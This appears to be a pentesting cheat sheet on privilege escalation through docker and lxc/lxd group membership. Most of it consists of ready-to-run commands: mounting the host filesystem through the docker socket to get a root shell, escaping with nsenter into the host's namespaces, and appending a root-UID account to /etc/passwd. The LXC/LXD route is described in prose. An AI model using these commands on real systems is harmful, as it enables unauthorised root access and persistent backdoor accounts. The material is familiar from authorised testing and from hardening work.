Docker Groups
Docker group exploits
To execute these exploits the current user has to be in docker group
Writable Docker Socket
If the docker socket is writable it can be used to run commands as an elevated user. Only users in root and docker group can read the socket file.
docker -H unix:///var/run/docker.sock run -v /:/mnt -it ubuntu chroot /mnt /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i shAccess arbitrary folders
docker images
docker run -v <folder>:/mnt -it <image>
cd /mntAdd user to /etc/passwd
docker images
docker run -v /etc/:/mnt -it <image>
cd /mnt
echo "<username>:$(openssl passwd <password>):0:0:/root:/root:/bin/bash" >> passwd
exit
su <username>Spawn shell
Root Please Docker image
A docker image that spawns a root shell.
LXC / LXD group exploit
To execute this exploit the current user has to be in lxc or lxd group. Download configure and build an Alpine image, mount /root and execute /bin/sh as root.
Last updated